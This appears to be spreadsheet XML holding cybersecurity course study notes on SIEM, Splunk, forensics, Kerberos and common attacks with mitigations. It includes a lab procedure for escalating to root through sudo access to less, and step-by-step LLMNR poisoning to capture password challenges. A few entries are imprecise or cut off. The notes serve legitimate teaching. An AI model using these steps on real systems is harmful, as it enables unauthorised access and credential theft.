    <t>Passwords are continuously stored in SAM and are always available offline.</t>
  </si>
  <si>
    <t>Windows Credentials Refreshe - Domain Account:</t>
  </si>
  <si>
    <t xml:space="preserve">Primarily use Kerberos for authentication, do not have their credentials stored in SAM. </t>
  </si>
  <si>
    <t>Registry:</t>
  </si>
  <si>
    <t>Database in Windows that stores settings for Windows and applications.</t>
  </si>
  <si>
    <t>kiwi:</t>
  </si>
  <si>
    <t>Metasploit version of Mimikatz</t>
  </si>
  <si>
    <t>Lateral Movement:</t>
  </si>
  <si>
    <t>Moving through the network from one machine to another.</t>
  </si>
  <si>
    <t>PsExec:</t>
  </si>
  <si>
    <t xml:space="preserve">Tool that manages Windows machines remotely using PowerShell. </t>
  </si>
  <si>
    <t>Lateral Movement Techniques - Remote 
 Services:</t>
  </si>
  <si>
    <t>An umbrella technique for any remote services on a machine—for example, SSH, VNC, and RDP. PsExec is a common lateral movement tool. It allows an administrator to execute PowerShell commands remotely. A pen tester can remotely execute a malicious PowerShell payload on a remote machine to gain access to it.</t>
  </si>
  <si>
    <t>Lateral Movement Techniques - Remote Services: RDP:</t>
  </si>
  <si>
    <t>Remote Desktop Protocol (RDP) will let a user log in to a machine remotely and control it as if they were logged in to it physically. Pen testers can leverage log in to any machines their compromised user has RDP access to.</t>
  </si>
  <si>
    <t>Lateral Movement Techniques - Exploitation of 
 Remote Services:</t>
  </si>
  <si>
    <t>Exploitation of old services is also a common lateral movement technique. 
 The SMB protocol has had several critical-severity vulnerabilities that allowed a pen tester to easily get SYSTEM privileges remotely over a machine.</t>
  </si>
  <si>
    <t>Lateral Movement Techniques - Remote Services: SMB/Windows 
 Admin Shares:</t>
  </si>
  <si>
    <t>This last example uses SMB to get access to a remote file system. In addition to serving the file system service, SMB is also used in conjunction with another protocol, RPC, in order to transfer files or access services such as Task Scheduler or Service Controller.</t>
  </si>
  <si>
    <t>C:\Windows\System32\NTDS.dit:</t>
  </si>
  <si>
    <t>User password hashes are stored on disk on the primary DC</t>
  </si>
  <si>
    <t>Information security continuous monitoring (ISCM),:</t>
  </si>
  <si>
    <t>The processes and technologies used to detect information security risks associated with an organization’s operational environment in real time.</t>
  </si>
  <si>
    <t>19.1 Introduction to SIEM</t>
  </si>
  <si>
    <t>Limiting ISCM - Financial Limitations:</t>
  </si>
  <si>
    <t>Most modern monitoring tools and technologies are very expensive to install, deploy, and run. Organizations often have strict budgets.</t>
  </si>
  <si>
    <t>Limiting ISCM - Staffing Limitations:</t>
  </si>
  <si>
    <t>While many monitoring tools have automated features, they often require humans to monitor and respond to detected issues.</t>
  </si>
  <si>
    <t>Prioritizing Risk - Compliance</t>
  </si>
  <si>
    <t>Depending on the business’s industry, it may be required to monitor and analyze certain application and system activity.</t>
  </si>
  <si>
    <t>Prioritizing Risk - Financial Impact:</t>
  </si>
  <si>
    <t>How a system breach or shutdown can impact the financial performance of an organization.</t>
  </si>
  <si>
    <t>Prioritizing Risk - Reputational Impact:</t>
  </si>
  <si>
    <t>How an incident would affect the business’s reputation among customers.</t>
  </si>
  <si>
    <t>Prioritizing Risk - Likelihood of Attack:</t>
  </si>
  <si>
    <t>While many types of security risk can occur, some are more likely than others.</t>
  </si>
  <si>
    <t>Logs:</t>
  </si>
  <si>
    <t>Record of an event occurring within a device or a network.</t>
  </si>
  <si>
    <t>Logs entries:</t>
  </si>
  <si>
    <t>Represent specific events occurring on a device or network.</t>
  </si>
  <si>
    <t>Types of Logs - Operating System Logs:</t>
  </si>
  <si>
    <t>created on devices such as Linux and Windows systems. Security events that can be identified by system access events and security permissions events.</t>
  </si>
  <si>
    <t>Types of Logs - Application Logs :</t>
  </si>
  <si>
    <t>Created by devices such as Apache and IIS (internet information services) servers. Security events that can be identified by application access events and fraud events.</t>
  </si>
  <si>
    <t>Types of Logs -  Networking device logs:</t>
  </si>
  <si>
    <t>Created on devices such as routers, switches, and DHCP/DNS servers. Security events that can be identified by Administrative events and Network Security Events.</t>
  </si>
  <si>
    <t>Types of Logs - Security device logs :</t>
  </si>
  <si>
    <t xml:space="preserve">Created on devices such as IDS/IPS, firewalls, endpoint devices, and honeypots. Security events that can be identified by Endpoint events and IDS signature events. </t>
  </si>
  <si>
    <t>Log aggregation:</t>
  </si>
  <si>
    <t>The identification and collection of logs from multiple computing sources.</t>
  </si>
  <si>
    <t>log Correlation :</t>
  </si>
  <si>
    <t xml:space="preserve">monitors incoming logs for logical sequences, patterns and values to identify events that are invisible to individual systems. </t>
  </si>
  <si>
    <t>Correlation Rules:</t>
  </si>
  <si>
    <t>A mechanism that enables automatic action on real-time events that are received by the ObjectServer, if a trigger condition is met.</t>
  </si>
  <si>
    <t>correlation alert:</t>
  </si>
  <si>
    <t>A notification that correlation rules have been met and an event was detected.</t>
  </si>
  <si>
    <t xml:space="preserve">Security Information and Event Management (SIEM): </t>
  </si>
  <si>
    <t>collect, organize, and analyze logs to detect security-related events across an organization’s technology infrastructure.</t>
  </si>
  <si>
    <t>SIEM - Security information management (SIM):</t>
  </si>
  <si>
    <t>Primarily focused on log management and involves collecting logs in a central location for later analysis.</t>
  </si>
  <si>
    <t>SIEM - Security event management (SEM):</t>
  </si>
  <si>
    <t>Primarily focused on event monitoring and involves identifying, evaluating, and correlating logs to determine security events and create alerts</t>
  </si>
  <si>
    <t>SIEM Vendor - Cost</t>
  </si>
  <si>
    <t>While cost is always a consideration when selecting a SIEM vendor, how an organization is billed can also be a consideration.</t>
  </si>
  <si>
    <t>SIEM Vendor - Ease of implementation 
 and use</t>
  </si>
  <si>
    <t>Organizations should research how challenging a SIEM vendor’s solutions will be to set up and manage.</t>
  </si>
  <si>
    <t>SIEM Vendor - Log compatibility</t>
  </si>
  <si>
    <t>Organizations should confirm that the SIEM vendor is able to accommodate every type of log the business is required to monitor.</t>
  </si>
  <si>
    <t>SIEM Vendor - SIEM features</t>
  </si>
  <si>
    <t>While every SIEM vendor claims to have the most advanced and user-friendly features, organizations should review each vendor’s features and assess which will best serve their business goals.</t>
  </si>
  <si>
    <t>A software tool that searches, analyzes, and monitors big data with an easy- to-use interface. Capture large amounts of incoming data, which can be used to create visualizations, reports, and alerts.</t>
  </si>
  <si>
    <t>19.2 Splunk Searches</t>
  </si>
  <si>
    <t>Splunk Architecture Basics - The Indexer:</t>
  </si>
  <si>
    <t>When Splunk receives incoming data, it transforms the incoming data into events. Splunk adds these events into repositories called indexes. Indexers are used to add events to indexes and search through the data.</t>
  </si>
  <si>
    <t>Splunk Architecture Basics - The search head:</t>
  </si>
  <si>
    <t>The search head is Splunk’s GUI that we use to conduct searches. It manages search requests to the indexer and provides the search results back to the user.</t>
  </si>
  <si>
    <t>Adding Data - Monitor:</t>
  </si>
  <si>
    <t>Splunk monitors logs from a system, device, or application that it has direct access to.</t>
  </si>
  <si>
    <t>Adding Data - Forward:</t>
  </si>
  <si>
    <t>Install a program called a forwarder on the system from which logs are collected.</t>
  </si>
  <si>
    <t>Adding Data - Upload:</t>
  </si>
  <si>
    <t>Manually upload logs directly into your Splunk repository.</t>
  </si>
  <si>
    <t>Splunk processing language (SPL):</t>
  </si>
  <si>
    <t xml:space="preserve">Splunk queries are designed using a coding language </t>
  </si>
  <si>
    <t>Key-value pairs:</t>
  </si>
  <si>
    <t xml:space="preserve">most common method used to search for data, match keywords with specific information (values).
</t>
  </si>
  <si>
    <t xml:space="preserve">Alerts - False positive:
</t>
  </si>
  <si>
    <t>When conditions are met and an alert is triggered, but the security situation being monitored did not actually occur.</t>
  </si>
  <si>
    <t>20.1 Splunk Dashboards and Visualizations.pptx</t>
  </si>
  <si>
    <t>Alerts - False Negative:</t>
  </si>
  <si>
    <t>When the condition is met and an alert is not triggered, meaning the security situation occurred undetected.</t>
  </si>
  <si>
    <t>Baselining:</t>
  </si>
  <si>
    <t>A method of looking at historical data to determine what is normal activity.</t>
  </si>
  <si>
    <t>Threshold:</t>
  </si>
  <si>
    <t>The condition or level that, when met, triggers an alert.</t>
  </si>
  <si>
    <t>Alert Fatigue:</t>
  </si>
  <si>
    <t>When Security Professionals receive so many alerts that they cannot adequately respond to each one.</t>
  </si>
  <si>
    <t>Gauge Visualization :</t>
  </si>
  <si>
    <t>Highlights the severity of the an activity count.</t>
  </si>
  <si>
    <t>Visualizations:</t>
  </si>
  <si>
    <t xml:space="preserve">Make complex data easier to understand and analyze. </t>
  </si>
  <si>
    <t>Radial Gauge :</t>
  </si>
  <si>
    <t>Similar to the RPM dial in a car dashboard. RPM (revolutions per minute) is a single value visualized in the dial. The dial includes a red section that indicates when the level is too high.</t>
  </si>
  <si>
    <t>Multiple-value Visualizations:</t>
  </si>
  <si>
    <t>A concise way to display multiple values together in a single tile. It's an effective layout for grouping similar types of content or related metrics.</t>
  </si>
  <si>
    <t>Geographic Map Visualization:</t>
  </si>
  <si>
    <t>A set of tools and techniques supporting the analysis of geospatial data through the use of interactive visualization.</t>
  </si>
  <si>
    <t>Dashboards:</t>
  </si>
  <si>
    <t>Collection of multiple visualizations in a single location.</t>
  </si>
  <si>
    <t>Panels:</t>
  </si>
  <si>
    <t>Area in which the visualizations are placed in different sections.</t>
  </si>
  <si>
    <t>Splunk Enterprise Security:</t>
  </si>
  <si>
    <t>SIEM product that provides security professionals insights from machine-generated data generated by such sources as Network devices like routers and firewalls, Endpoint devices like antivirus solutions, Vulnerability management systems like Nessus .</t>
  </si>
  <si>
    <t>Advanced Security Monitoring:</t>
  </si>
  <si>
    <t>The most popular advancements in the information security industry including:User behavior analytics, User and entity behavior analytics, Security orchestration, automation, and response .</t>
  </si>
  <si>
    <t>User Behavior Analytics (UBA):</t>
  </si>
  <si>
    <t>A security monitoring tool that uses machine learning, artificial intelligence, and data processing to detect abnormalities in user activity</t>
  </si>
  <si>
    <t>User and Entity Behavior Analytics (UEBA):</t>
  </si>
  <si>
    <t>A security monitoring tool similar to UBA, except it extends its monitoring to other “entities”. Entities can include routers, servers, and IoT devices.</t>
  </si>
  <si>
    <t>Security Orchestration, Automation, and Response (SOAR):</t>
  </si>
  <si>
    <t>Comparable to a SIEM, it automates security processes and responds to security incidents</t>
  </si>
  <si>
    <t>Playbooks:</t>
  </si>
  <si>
    <t>Details the processes and response actions for specific events.</t>
  </si>
  <si>
    <t>Digital Forensics:</t>
  </si>
  <si>
    <t xml:space="preserve">Process of using scientific procedures to collect, analyze, and present evidence from digital devices, usually in relation to criminal investigations. </t>
  </si>
  <si>
    <t>21.1 Introduction to Digital Forensics</t>
  </si>
  <si>
    <t>Computer Forensics Investigators:</t>
  </si>
  <si>
    <t>Gather digital information for computer system investigations, producing criminal evidence that can be used in a court of law.</t>
  </si>
  <si>
    <t>Computer Forensics Technicians :</t>
  </si>
  <si>
    <t>Use investigative and computer analysis techniques to acquire, analyze, and preserve digitized evidence to be used for legal purposes. They work with law enforcement, government entities, or as private investigators.</t>
  </si>
  <si>
    <t>Forensics Computer Analysts :</t>
  </si>
  <si>
    <t>Specialize in the recovery of deleted emails or other data that has been encrypted or deleted. This material is used in legal cases involving computer crimes.</t>
  </si>
  <si>
    <t>Goal in DF:</t>
  </si>
  <si>
    <t xml:space="preserve">Present evidence that can be used in a court of law. </t>
  </si>
  <si>
    <t>Chain of Custody:</t>
  </si>
  <si>
    <t>Documentation of possession of evidence that proves integrity and accountability of the investigation by Documenting every step of the investigation, showing uninterrupted control, and  Ensuring evidence is not tampered with or contaminated.</t>
  </si>
  <si>
    <t>Evidence Collection - Network-based Data:</t>
  </si>
  <si>
    <t>Comes from data communications captured by network-based systems such as IDS, IPS, and firewalls, in the form of a packet capture or similar.
- Packet captures are useful for reconstructing events involving computer break-ins.
- Logs from firewalls also provide insight into network activity.</t>
  </si>
  <si>
    <t>Evidence Collection - Host-based Data:</t>
  </si>
  <si>
    <t>Typically found on a system that has a wide variety of artifacts.
- Investigations involving computer break-ins may involve the forensic examination of local file systems, programs, access to critical documents, and/or alterations to system files and directories.
- Host-based examinations may involve reconstructing internet use, unauthorized activity, email recovery, and the identification of malicious files.</t>
  </si>
  <si>
    <t>Forensic backups (Bit-stream Image):</t>
  </si>
  <si>
    <t xml:space="preserve">Captures all created sections of a hard drive (partitions), whether used or not, and all unallocated drive space that doesn’t belong to partitions.
- An exact replica of all contents on the hard drive, including slack space, free space, and deleted files. </t>
  </si>
  <si>
    <t>Local File System Copy:</t>
  </si>
  <si>
    <t xml:space="preserve">Inadequate for forensic analysis. If you make a copy through the file or operating system level, you can access only the data that the operating system can access. This won’t capture deleted files or slack space. </t>
  </si>
  <si>
    <t>Forensic Disk Image Formats - RAW:</t>
  </si>
  <si>
    <t>Created with programs like dd, ddfldd, and ddcdd.</t>
  </si>
  <si>
    <t>Forensic Disk Image Formats - Advanced Forensic Format (AFF):</t>
  </si>
  <si>
    <t>For disk image and related forensic metadata.</t>
  </si>
  <si>
    <t>Write Blocker:</t>
  </si>
  <si>
    <t xml:space="preserve">A device that allows anything connected to it to only perform read operations. This prevents the drive from being written to and evidence from being overwritten. </t>
  </si>
  <si>
    <t>File Systems - New Technology File System (NTFS):</t>
  </si>
  <si>
    <t>Supported by Windows 10, 8, 7, Vista, XP, and NT.</t>
  </si>
  <si>
    <t>File Systems -File Allocation System (FAT):</t>
  </si>
  <si>
    <t>Supported by older and newer versions of Windows.</t>
  </si>
  <si>
    <t>File Systems - Apple File System (AFS):</t>
  </si>
  <si>
    <t>Used by the macOS system.</t>
  </si>
  <si>
    <t>File Systems - Fourth Extended File System (Ext4):</t>
  </si>
  <si>
    <t>Used in RedHat, Kali, and Ubuntu.</t>
  </si>
  <si>
    <t>Mechanical Hard Drives:</t>
  </si>
  <si>
    <t xml:space="preserve">Mechanical hard drives have far larger storage capacities than other types of drives. This means the imaging process can take a very long time when performing a bit-level copy. They also have very delicate moving parts that can be damaged if not handled properly.
- You can recover data from badly damaged devices, as long as you have the required knowledge of mechanical hard drives. </t>
  </si>
  <si>
    <t xml:space="preserve">Flash Storage:
</t>
  </si>
  <si>
    <t>Flash storage devices have no moving parts and use flash memory, allowing for quicker read and write access. 
- Flash memory or flash storage is non-volatile, meaning it holds data even when disconnected from power. 
- It’s used in devices such as USB drives, mobile phones, cameras, and tablet computers.</t>
  </si>
  <si>
    <t>Solid State Drives (SSD):</t>
  </si>
  <si>
    <t xml:space="preserve">SSD storage devices use flash memory chips and have no moving parts. They also have larger storage capacity and faster read–write access.
- SSD data can be lost or wiped out in seconds, so investigators must be careful when using forensic tools to image and recover data.  </t>
  </si>
  <si>
    <t>SD/MicroSD Cards:</t>
  </si>
  <si>
    <t>SD cards store data inside a flash memory chip, similar to solid-state devices. 
- It is possible to retrieve SD card data even if it has been deleted or the disk has been formatted. Rather than being erased, data is set aside for reuse. 
- It’s used in cell phones and smartphones.</t>
  </si>
  <si>
    <t>Firmware:</t>
  </si>
  <si>
    <t>Specific class of computer software that provides the low-level control for a device's specific hardware.</t>
  </si>
  <si>
    <t>Computer Forensics:</t>
  </si>
  <si>
    <t xml:space="preserve">the identification, preservation, collection, analysis, and reporting of evidence acquired from computers, notebooks, and storage media. 
It is used to support investigations and legal proceedings. </t>
  </si>
  <si>
    <t>Disk Forensics:</t>
  </si>
  <si>
    <t>This involves acquiring and analyzing information stored on physical storage media, such as hard drives, smartphones, GPS systems, and removable media.</t>
  </si>
  <si>
    <t>Memory Forensics:</t>
  </si>
  <si>
    <t>This inspects computer memory to identify an attacker's activities on a system.</t>
  </si>
  <si>
    <t>Network Forensics:</t>
  </si>
  <si>
    <t>The monitoring, recording, storing, and analysis of all network traffic to determine the source of security events. 
- Wireshark, Snort</t>
  </si>
  <si>
    <t>Email forensics:</t>
  </si>
  <si>
    <t xml:space="preserve">Analyzes the source and content of an email as evidence. </t>
  </si>
  <si>
    <t>Mobile device forensics:</t>
  </si>
  <si>
    <t>The recovery of digital evidence from smartphones, GPS devices, SIM cards, PDAs, tablets, and game consoles.</t>
  </si>
  <si>
    <t>AddressBook.sqlitedb</t>
  </si>
  <si>
    <t>Contact info and personal data like name, email address, etc</t>
  </si>
  <si>
    <t>21.2 Autopsy and iPhone Forensics</t>
  </si>
  <si>
    <t>AddressBookImages.sqlitedb</t>
  </si>
  <si>
    <t>Images associated with saved contacts</t>
  </si>
  <si>
    <t>Calendar.sqlitedb</t>
  </si>
  <si>
    <t>Calendar details and events information</t>
  </si>
  <si>
    <t>CallHistory.db</t>
  </si>
  <si>
    <t>Call logs, including phone numbers and timestamps</t>
  </si>
  <si>
    <t>sms.db</t>
  </si>
  <si>
    <t>Text and multimedia messages along with time stamps</t>
  </si>
  <si>
    <t>voicemail.db</t>
  </si>
  <si>
    <t>Voicemail messages</t>
  </si>
  <si>
    <t>Safari/Bookmarks</t>
  </si>
  <si>
    <t>Saved URL addresses</t>
  </si>
  <si>
    <t>Envelope Index</t>
  </si>
  <si>
    <t>Email addresses on phone</t>
  </si>
  <si>
    <t>consolidated.db</t>
  </si>
  <si>
    <t>GPS tracking data</t>
  </si>
  <si>
    <t>locationd</t>
  </si>
  <si>
    <t>Google coordinates of locations</t>
  </si>
  <si>
    <t xml:space="preserve">Evidence tagging </t>
  </si>
  <si>
    <t>The process of bookmarking evidence to keep critical details organized and easily accessible.</t>
  </si>
  <si>
    <t>Smishing:</t>
  </si>
  <si>
    <t>A social engineering attack performed using SMS messages.</t>
  </si>
  <si>
    <t>Beginner - Certified Ethical Hacker (CEH):</t>
  </si>
  <si>
    <t>Focuses on penetration testing, it also covers a broad range of topics relevant to InfoSec professionals. Also offers an advanced certification, CEH Practical, which tests individuals’ skills with hands-on penetration testing tools.</t>
  </si>
  <si>
    <t>Beginner - GIAC Security Essentials (GSEC):</t>
  </si>
  <si>
    <t>Covers a broad range of topics ranging from active defense to cryptography.</t>
  </si>
  <si>
    <t>Beginner - Systems Security Certified Professional (SSCP):</t>
  </si>
  <si>
    <t>Offered by (ISC)2 and Covers security best practices for setting up, monitoring, and administering IT infrastructure.</t>
  </si>
  <si>
    <t>Advanced -  Certified Information Systems Security Professional (CISSP)  :</t>
  </si>
  <si>
    <t>Advanced certification offered by (ISC)2. Covers a wide variety of cybersecurity topics and is one of the most popular certifications in information security.</t>
  </si>
  <si>
    <t>Advanced -  Certified Information Security Manager (CISM):</t>
  </si>
  <si>
    <t>A certification offered by ISACA and covers information security management topics.</t>
  </si>
  <si>
    <t>Specialized - Offensive Security Certified Pentester (OSCP):</t>
  </si>
  <si>
    <t>A specialized pen testing certification offered by Offensive Security. Consists of a practical exam consisting of two parts: a 24-hour penetration testing exam and a documentation report due 24 hours after the exam.</t>
  </si>
  <si>
    <t>Specialized - Certified Information Privacy Professional (CIPP):</t>
  </si>
  <si>
    <t>A specialized privacy certification offered by IAPP and is considered the “gold standard” for those working in privacy.</t>
  </si>
  <si>
    <t>Specialized - EnCase Certified Examiner (EnCE):</t>
  </si>
  <si>
    <t>A vendor-specific specialized certification for computer forensics professionals. Offered by OpenText and used by law enforcement.</t>
  </si>
  <si>
    <t>Identity and Access Management (IAM):</t>
  </si>
  <si>
    <t>The security policies that ensure an organization’s resources are only accessible by the right people, for the right reasons, at the right times.</t>
  </si>
  <si>
    <t xml:space="preserve">Authentication, Authorization, and Accounting (AAA): </t>
  </si>
  <si>
    <t>The framework to best control access to an organization’s resources.</t>
  </si>
  <si>
    <t>Kerberos:</t>
  </si>
  <si>
    <t>An authentication protocol developed at MIT that uses tickets.</t>
  </si>
  <si>
    <t>Password Authentication Protocol (PAP):</t>
  </si>
  <si>
    <t>Uses a standard username and password to authenticate to a remote system. 
 It is considered insecure.</t>
  </si>
  <si>
    <t>Challenge-Handshake Authentication Protocol (CHAP):</t>
  </si>
  <si>
    <t>Uses a three-way handshake, making it more secure than PAP.</t>
  </si>
  <si>
    <t>Vulnerability</t>
  </si>
  <si>
    <t>Procedure</t>
  </si>
  <si>
    <t>Less Vulnerability</t>
  </si>
  <si>
    <t>Run sudo visudo and edit the entry for john to give him sudo access to less.
Output should look like:
    john ALL=(ALL:ALL) /usr/bin/apt, /usr/bin/less
Save and exit.
Now we will run sudo less on any file that belongs to John:
Run su john (password: lakers) to switch to John's user.
Run touch /home/john/my_file.
Run sudo less /home/john/my_file.
enter a key, then press enter. You should be logged in as root</t>
  </si>
  <si>
    <t>Attack</t>
  </si>
  <si>
    <t>Attack Definition</t>
  </si>
  <si>
    <t>Mitigations</t>
  </si>
  <si>
    <t>Be sure algorithms are using random values</t>
  </si>
  <si>
    <t>Brute Force  Attack:</t>
  </si>
  <si>
    <t>Attackers use many passwords or user and password combinations until one eventually works.</t>
  </si>
  <si>
    <t xml:space="preserve">Apply lockout features to limit the number of login attempts a user has before getting locked out.
Applications can use firewalls that detect and stop large volumes of attempted logins from a single source IP address.
</t>
  </si>
  <si>
    <t>Birthday Attacks:</t>
  </si>
  <si>
    <t>Exlpoit the probability that two seperate plaintexts that use the same algorithm will produce the same ciphertext.</t>
  </si>
  <si>
    <t xml:space="preserve">Stronger hashing algorithms </t>
  </si>
  <si>
    <t>Frequency Analysis Attack:</t>
  </si>
  <si>
    <t xml:space="preserve">An attacker can note the most frequently used letters in the ciphertext and substitute them with the most frequently used letters in the English language (e, t, o, a). After inferring the ciphertext, the plaintext can be cracked. </t>
  </si>
  <si>
    <t xml:space="preserve">This method targets standard ciphertext ciphers. Mitigate 
by using more advanced encryption algorithms. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Add an expiration time for the encrypted data, so it can’t be replayed at a later date. 
</t>
  </si>
  <si>
    <t>Known-Plaintext:</t>
  </si>
  <si>
    <t xml:space="preserve">When an attacker has access to a ciphertext and its associated plaintext, they can analyze the two to determine the encryption algorithm and decrypt future messages. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Use advanced encryption and limiting access to ciphertext and associated plaintext. 
</t>
  </si>
  <si>
    <t>Chosen-Plaintext:</t>
  </si>
  <si>
    <t>When an attacker has access to the encryption program and ciphertext, but not the plaintext, they can encrypt several plaintext messages to learn how the ciphertext is generated.</t>
  </si>
  <si>
    <t>Occurs when an attacker accesses files and directories from a web application outside a user’s authorized permissions.
- A01: OWASP Top 10</t>
  </si>
  <si>
    <t>Limiting user input when calling for files from the web application.
Using input validation to limit the user’s ability to modify the file being accessed, if the application does require user input when calling for files.
Running web servers under a special service user account that only has access to that web folder. Apache typically uses the www-data account.</t>
  </si>
  <si>
    <t>A web application vulnerability in which an attacker tricks the application into running unintended back-end code or scripts that are local to the application’s filesystem.
- A01, A02, A05: OWASP Top 10</t>
  </si>
  <si>
    <t>If the application requires file upload functionality, then the application should use allow listing to ensure that only a specific file type (like .jpg) can be uploaded, and not script file types such as .php.</t>
  </si>
  <si>
    <t>Remote file inclusion (RFI):</t>
  </si>
  <si>
    <t>Avoid passing user-submitted input to your web server. This can be accomplished by using input validation.</t>
  </si>
  <si>
    <t>LLMNR Poisoning :</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">Attackers take advantage of LLMNR broadcast sent out to the entire network by listening for LLMNR request broadcasts on the network and spoofing (faking) a response to the request, asking for the requesting computer to complete a password challenge.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>1.</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">The attacker listens for LLMNR requests on the network.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>2.</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> A Windows machine user tries to visit a network share that doesn't exist or makes a typo trying to visit an existing one.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">3. </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">The victim’s computer asks the DNS server if it knows where the network share is.The server responds with a share not found.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">4. </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">The user’s computer then sends an LLMNR broadcast to the entire network, asking if any machines know where the file share is.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">5. </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">The attacker receives this request and responds by asking the computer to encode a challenge with the user’s password.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">6. </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>Once the attacker receives the challenge encoded with the password, it responds to the computer with an error, which ends the communication. The attacker now has the victim’s password, which they can crack offline.</t>
    </r>
  </si>
  <si>
    <t>Three Way Handshake Procedure (TCP)</t>
  </si>
  <si>
    <t>Setup</t>
  </si>
  <si>
    <t>Step</t>
  </si>
  <si>
    <t>SYN</t>
  </si>
  <si>
    <t>Client sends SYN data packet to the server to determine if it is ready to open a connection</t>
  </si>
  <si>
    <t>SYN/ACK</t>
  </si>
  <si>
    <t>The server acknowledges or confirms reciept of the SYN packet.</t>
  </si>
  <si>
    <t>ACK</t>
  </si>
  <si>
    <t>Client confirms reciept of the SYN/ACK packet. Once the handshake is successful, the data transmission will begin.</t>
  </si>
  <si>
    <t>Termination</t>
  </si>
  <si>
    <t>FIN</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>OSI Model Layers</t>
  </si>
  <si>
    <t>Physical</t>
  </si>
  <si>
    <t>Physical components and hardware used to transmit data between nodes, eg. Ethernet.</t>
  </si>
  <si>
    <t>Data-Link</t>
  </si>
  <si>
    <t>The data link layer focuses on the physical addressing of the transmission. It receives a packet from the network layer (including the IP address for the remote computer) and adds in the physical MAC (Media Access Control) address of the receiving endpoint.</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>Layer in which routing &amp; re-assembly of data takes place, whereby the optimal routing route is used to transmit data via IP.</t>
  </si>
  <si>
    <t>Transport</t>
  </si>
  <si>
    <t>Manages network traffic over TCP and UDP between hosts and end systems to ensure complete data transfers.</t>
  </si>
  <si>
    <t>Session</t>
  </si>
  <si>
    <t>Allows users on different machines to establish active communications sessions between them.</t>
  </si>
  <si>
    <t>Presentation</t>
  </si>
  <si>
    <t>receives the data from the application layer and translates it into a format and syntax that's readable by other computers.</t>
  </si>
  <si>
    <t>Application</t>
  </si>
  <si>
    <t>Layer in which protocols and rules are in place to determine how the user should interact with data sent or received. Usually GUI.</t>
  </si>
  <si>
    <t>Incidident Response Process</t>
  </si>
  <si>
    <t>Preparation</t>
  </si>
  <si>
    <t>Detection and Analysis</t>
  </si>
  <si>
    <t>Containment, Eradication, Recovery</t>
  </si>
  <si>
    <t>Post-Incident Activity</t>
  </si>
  <si>
    <t xml:space="preserve">Lessons learnt, and actions taken to </t>
  </si>
  <si>
    <t>Kerberos Process</t>
  </si>
  <si>
    <t>Initial Client Authentication Request</t>
  </si>
  <si>
    <t xml:space="preserve">Starts with the client logging in to the domain. The user asks for the TGT or authentication token from the AS. The TGT request is sent to the Kerberos KDC. </t>
  </si>
  <si>
    <t>Verification of Client Credentials</t>
  </si>
  <si>
    <t xml:space="preserve">The KDC must verify the user's credentials to send an encrypted session key and TGT. The AS checks for the TGS's and client's availability in the database. If both values are found, the AS generates the secret key. It also creates a session key (SK1) that is encrypted by the user's secret key and a TGT with the client network address, identification (ID), timestamp, lifetime, and SK1. Then, the TGS secret key encrypts the ticket. </t>
  </si>
  <si>
    <t>Message Decryption</t>
  </si>
  <si>
    <t xml:space="preserve">The client uses the client/user hash or secret key to extract the TGT and SK1 and decrypt the message, then generates the authenticator that validates the TGS. </t>
  </si>
  <si>
    <t>Request for Access Using the TGT</t>
  </si>
  <si>
    <t>The client then requests a ticket from the SS by sending the authenticator and the extracted TGT to the TGS.</t>
  </si>
  <si>
    <t>Creation of Ticket for the File Server</t>
  </si>
  <si>
    <t>The TGS secret key is used to decrypt the TGT from the client and extract the SK1. TGS also decrypts the authenticator and verifies that it matches the network address and the client ID, and ensures that the TGT is not expired by using an extracted timestamp. If all checks are done successfully, the KDC will generate a shared service session key (SK2) for the target server and the client. The KDC then creates a service ticket with the client network address, ID, timestamp, and SK2. This ticket will be encrypted with the server's secret key, and the client will receive the service ticket and SK2, which will be encrypted with the SK1.</t>
  </si>
  <si>
    <t>Authentication Using the File Ticket</t>
  </si>
  <si>
    <t>The client then uses the file ticket to authenticate by decrypting the message with SK1 and extracting SK2. Doing so will generate another authenticator, encrypted with SK2, that includes the client ID, network address, and timestamp. The client then sends a service ticket along with the new authenticator to the target server.</t>
  </si>
  <si>
    <t xml:space="preserve">Decryption and Authentication of the Target Server </t>
  </si>
  <si>
    <t xml:space="preserve">As the final step in the Kerberos protocol, the target server then decrypts the service ticket and extracts the SK2 using the server's secret key. SK2 decrypts the authenticator, and checks are performed to ensure that the client network address and ID from the service ticket and the authenticator match. After all checks are made and met, the client will receive a message from the server stating that the server and the client have authenticated each other. </t>
  </si>
  <si>
    <t>Browser Cache</t>
  </si>
  <si>
    <t>The Operating System's cache, stored in the hosts file</t>
  </si>
  <si>
    <t>DHCP Request and Recieve Four Step Process</t>
  </si>
  <si>
    <t>DHCP Discover</t>
  </si>
  <si>
    <t>The Client needs to find the server.</t>
